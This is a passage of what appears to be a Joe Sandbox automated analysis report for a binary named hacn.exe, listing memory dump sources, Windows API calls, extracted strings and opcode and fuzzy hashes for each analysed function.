                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                          • String ID: ?
                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                          • Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                                                                                          • Instruction ID: c190893c0a36d4af7391d6a67def244ae94757e033ca7d43fc1943cec8eba058
                                                                                                                                          • Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                                                                                          • Instruction Fuzzy Hash: 7441F732A08A9282FB648B25E5413BAD660EB92FB4F144235EE5D86BD5FF3ED441C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3396D6
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C
                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61D32C0E5), ref: 00007FF61D3396F4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                                                                          • String ID: C:\Users\user\Desktop\hacn.exe
                                                                                                                                          • API String ID: 2553983749-3561306021
                                                                                                                                          • Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                                                                                          • Instruction ID: 6ba792849870dda457a27e8a174c388a9e6d3a8eb46eee94bc6555994102a006
                                                                                                                                          • Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                                                                                          • Instruction Fuzzy Hash: 8C41B536A08F52D6EB54DF21DA410BCA3A4EF86FE4B144035EA0E87B95EF3DE4818310
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                          • String ID: U
                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                          • Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                                                                          • Instruction ID: 2a11210588323f9d5c8d33dcab901f207106aba2541bd7399a74ac79d1407d44
                                                                                                                                          • Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                                                                          • Instruction Fuzzy Hash: 6E419372B19A8195DB60DF29F4443A9A760FB99BA4F804031EE4DC7798EF3CD545C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                          • String ID: :
                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                          • Opcode ID: c7252e4211a414b80b8e1d21f501cf8779cf85d1136e96c1270fdab77ddbd927
                                                                                                                                          • Instruction ID: b5c166bc29ed5469c6c893124a8d3892a966c0bfd321bf1c946290a3524a9b03
                                                                                                                                          • Opcode Fuzzy Hash: c7252e4211a414b80b8e1d21f501cf8779cf85d1136e96c1270fdab77ddbd927
                                                                                                                                          • Instruction Fuzzy Hash: 7D21E133A08AC181EB64DB25D05426EB3B1FBC9F98F858035DA8D83684EF7CE944CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                          • String ID: Fatal error detected
                                                                                                                                          • API String ID: 1878133881-4025702859
                                                                                                                                          • Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                          • Instruction ID: 9ea93b1e940c23ccc927797284722592d12e56604725bf6069100eabb1a6720e
                                                                                                                                          • Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                          • Instruction Fuzzy Hash: 8C21A972A28E8191E724DB21F4916EAE354FF85BD8F805135E68D87A69EF3CD305CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                          • String ID: Error detected
                                                                                                                                          • API String ID: 1878133881-3513342764
                                                                                                                                          • Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                          • Instruction ID: e55e54331727d43b1baf570da55ff03be60f9aad03714ceac1435148462414e1
                                                                                                                                          • Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                                                                          • Instruction Fuzzy Hash: 2021CC72628E8581E724DB20F4916DAE354FF85BD8F805135E64D87965EF3CD205CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                          • String ID: csm
                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                          • Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                          • Instruction ID: 6c92b5b0552f82232b7c7c1bfad5803d54b5a6356d461f6c8fe6c4fd46b29960
                                                                                                                                          • Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                          • Instruction Fuzzy Hash: 63115B33A18F4182EB608F25E44026AB7E0FB89F98F584234EE8C87758EF3CC5518B40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                          • String ID: :
                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                          • Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                          • Instruction ID: d49bf65fc7cdd98b4ca7a70061335fcce2dbb19d2882b26c12fd4f09a57c0115
                                                                                                                                          • Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                          • Instruction Fuzzy Hash: ED01A272E1CA4286FB60EF60946127EE3A0EF86F28F800035D54DC6695FF3DE504CA14
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                                                          • API String ID: 2943138195-1388207849
                                                                                                                                          • Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                                                          • Instruction ID: 1f676d6e16aa6a2699a040e0f9f6b17905a11fcb78648cf4b936e6efe7ab4705
                                                                                                                                          • Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                                                          • Instruction Fuzzy Hash: 3EF19DB2F08E1294F755AB66C8442BC26B0BB01F64F4449F7CA1D97AB9DF3DA664C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: `anonymous namespace'
                                                                                                                                          • API String ID: 2943138195-3062148218
                                                                                                                                          • Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                                                          • Instruction ID: aa17e701eec8a89f978f16ee0dc0f4f9a748a799287ea09d2532b3a749971802
                                                                                                                                          • Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                                                          • Instruction Fuzzy Hash: 90E17AB2B08B8295EB10EF66E8801BD77B0FB44B68F4481B6EA4D57B65DF38D564C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2943138195-0
                                                                                                                                          • Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                                                          • Instruction ID: e92beea8d233fa579ddbbb0a83636ca7f0e9fab178687b9a742e8b7c7f0520f8
                                                                                                                                          • Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                                                          • Instruction Fuzzy Hash: 54F18AB2F08B829AE701EF66D4901FC37B1EB04B58F4480F2EA4D57AA5DE38D569C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                                                                                          • API String ID: 2943138195-2309034085
                                                                                                                                          • Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                                                          • Instruction ID: ecb21210ebae98f05e1b43257bdc6b7954e0f60bbfdf2b840741a93ab9fa900a
                                                                                                                                          • Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                                                          • Instruction Fuzzy Hash: 8FE19EA2F08E0295FB15FB66C9541BC27A0AF05F64F5401F7CA8D17AB9DE3CA56AC340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                          • API String ID: 3436797354-393685449
                                                                                                                                          • Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                                                          • Instruction ID: a6d83e2dcd125bfbc972fd24c4e86497a2278a726ab0540f8e308fdf58788eba
                                                                                                                                          • Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                                                          • Instruction Fuzzy Hash: F2D15FB2B08B4186EB50AF66D4502BD77A4FB45FA8F0401B6EE4D57769CF38E5A4C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                          • API String ID: 0-3207858774
                                                                                                                                          • Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                                                          • Instruction ID: 39fa4b15e6ae35a8a47f191e89300ea927501442fc37c2752eba87970adc2b12
                                                                                                                                          • Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                                                          • Instruction Fuzzy Hash: 64919EA2B08E8699EB20EB62D4411B877B1AB45FA4F5881F3DA5D033B5DF3CE565C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+$Name::operator+=
                                                                                                                                          • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                          • API String ID: 179159573-1464470183
                                                                                                                                          • Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                                                          • Instruction ID: 723a31083c13f433bf19b98db3c0aab2968863a39aaade657d1a71d5e50b633f
                                                                                                                                          • Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                                                          • Instruction Fuzzy Hash: 91517BB1F08B5299FB14EB66E8451BC37B0BB04BA8F5401B6EA0D53A68DF39E561C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2943138195-0
                                                                                                                                          • Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                                                          • Instruction ID: 439b831f61ccae05f7a44ed936508f326a15a1e937358132dc6aa78a7b56779b
                                                                                                                                          • Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                                                          • Instruction Fuzzy Hash: F36162A2F04B5698FB01EBA2D8801FC37B1BB44B68F4044B6DE4D6BA69EF78D555C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                          • API String ID: 211107550-393685449
